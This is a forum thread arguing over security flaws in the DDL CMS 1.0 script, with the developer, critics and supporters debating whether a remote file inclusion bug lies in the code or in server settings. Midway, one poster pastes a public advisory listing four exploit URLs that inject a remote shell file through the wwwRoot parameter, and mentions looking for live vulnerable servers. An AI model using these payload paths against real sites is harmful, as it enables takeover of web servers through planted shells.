DDLCMS question?

[JmZ]

Little Dragon im not "bashing" or whatever you want to call it.

I'm just stating that, genuinly and truthfully, it is full of exploits. Not my problem if you can't find them yourself.

JmZ Reviewed by JmZ on 24th Sep 2009. DDLCMS question? I saw before that DDLCMS was still very buggy doesn't anyone know if the bug list has shortened? Thanks! Rating: 5

[William Palmer]

JmZ you can not expect one to be perfect in all for example lets take a Police Officer his main task is to protect us and then we have the hacker which does illegal use of the pc

now the polie officers thoughts and ideas are beyond the scope of hacking methodology

so he decides to make a script and publishes and there is a exploit in it should we blame him for the lack of him not know hacking methodology?

no we should not we all specialize in different aspects of life Little Dragon might be good at this as you might good at something else does that make you better or not? that's reportorial btw.

[JmZ]

Strange example, but dragon should know how to remove examples.
So it isn't really relevant.

Anyway, as I said in my previous post and every other relevant post, i'm posting facts, nothing related to little dragon himself.

[DEViANCE]

Its only the first version though and has a lot of features, it bound to have some teething problems but its a far more complete script than ANYTHING out there now, i have tried them all.

Why not help rather than saying "its your own fault if you can't find them" ??

[CyberHacK]

Definently looking forward to it Little Dragon . I'm even loving version 1.0 which means the next version will rock.

[Little Dragon]

@ William: Thanks for the report bro. It has been forwarded to the dev. team to see if it is an issue and if it is, it will be addressed and fixed.

Edit: It appears that the exploit you reported is not an exploit of the script itself, but rather, a server setting, namely, allow_url_include.

If a server has allow_url_include set to "On", that is a security risk, for any script. Here is the response from the dev team:

"if they've got allow_url_include turned on, this is a huge problem. The script really can't be responsible for their misconfigurations.
This exploit for misconfigured servers has been removed in the latest release of
this script. "

So, even if a server is misconfigured, the script still blocks the so-called exploit, so it's been fixed already Thanks for the heads up though, I love it when people try to help, so it's much appreciated William!

Little Dragon im not "bashing" or whatever you want to call it.

If you aren't trying to bash my script, then what are you trying to do? Help me? Like the others who have provided useful information and have given me suggestions and such? Who are you trying to fool? No one on this board I bet (except yourself).

I'm just stating that, genuinly and truthfully, it is full of exploits. Not my problem if you can't find them yourself.

So, Jmz, what's your point? What are you trying to accomplish? Nevermind, dont' bother answering, I'm sick of seeing your ignorant replies to my work.

I'd rather hear from people like William who actually try to HELP me and everyone else out with the development of this script. If you don't want to help, then once again I say, go find something productive to do.

Strange example, but dragon should know how to remove examples.
So it isn't really relevant.

Anyway, as I said in my previous post and every other relevant post, i'm posting facts, nothing related to little dragon himself.

Yeah, right. [JmZ, do me a favour and hover your mouse cursor over this smiley ]

Its only the first version though and has a lot of features, it bound to have some teething problems but its a far more complete script than ANYTHING out there now, i have tried them all.

Why not help rather than saying "its your own fault if you can't find them" ??

DEViANCE, thanks for the comments. Well said bro

Definently looking forward to it Little Dragon . I'm even loving version 1.0 which means the next version will rock.

Thanks CyberHack, that's the goal. It will indeed rock!

[JmZ]

I love it when I get quoted so many times.

I posted here saying it contains exploits, because it does.

As for your reasoning of one exploit being due to "allow_url_include", the script should check paths before it tries including them (which it isn't, obviously). Regardless of if that server setting is set or not, that variable in the URL should be checked to be within the server's directories and not above a certain level. Coders should know these kind of things instead of blaming it on a server setting. The server setting just "enables" the exploit, it isn't the reason for it. The reason for it is the code.

[DEViANCE]

I love it when I get quoted so many times.

I posted here saying it contains exploits, because it does.

As for your reasoning of one exploit being due to "allow_url_include", the script should check paths before it tries including them (which it isn't, obviously). Regardless of if that server setting is set or not, that variable in the URL should be checked to be within the server's directories and not above a certain level. Coders should know these kind of things instead of blaming it on a server setting. The server setting just "enables" the exploit, it isn't the reason for it. The reason for it is the code.

That makes sence but are there any servers that actually have that setting on??

I don't like the way it is using a number to count the path (or however it works), and even worse that it is hardcoded.. it seems like a strange method.

But back to that exploit here it is:

Code: 

+============================================================+
|                                                            |
| DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities |
|                                                            |
+============================================================+
|                                                            |
| Author : HxH                                               |
|                                                            |
| E-Mail : HxH[at]live[dot]at                                |
|                                                            |
+------------------------------------------------------------+
|                                                            |
| Script : http://www.ddlcms.com/DDLCMS_v1.0.zip             |
|                                                            |
+------------------------------------------------------------+
|                                                            |
| Exploit :                                                  |
|                                                            |
| /header.php?wwwRoot=[Shell.txt?]                           |
|                                                            |
| /submit.php?wwwRoot=[Shell.txt?]                           |
|                                                            |
| /submitted.php?wwwRoot=[Shell.txt?]                        |
|                                                            |
| /autosubmitter/index.php?wwwRoot=[Shell.txt?]              |
|                                                            |
+============================================================+
|                                                            |
| Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members |
|                                                            |
+============================================================+

# milw0rm.com [2009-09-21]

But i tried to find any servers running ddl cms with this setting on (for testing purposes not malicious) and couldn't find one.

Seriously though if we all work together and try and fix any problems the script will be great.

[r0ck]

^well said, exactly what i was thinking but was going to stay out of this

[JmZ]

DEViANCE: PHP 5.3 has it disabled by default i think, 5.2 or 5.1 may have it enabled. PHP4 doesn't even have the option as far as I know, meaning all PHP4 servers are vulnerable I suppose.

As for working together to fix the problems, it's his script and his responsibility. It's just a script, the coders can and will fix it themselves (eventually).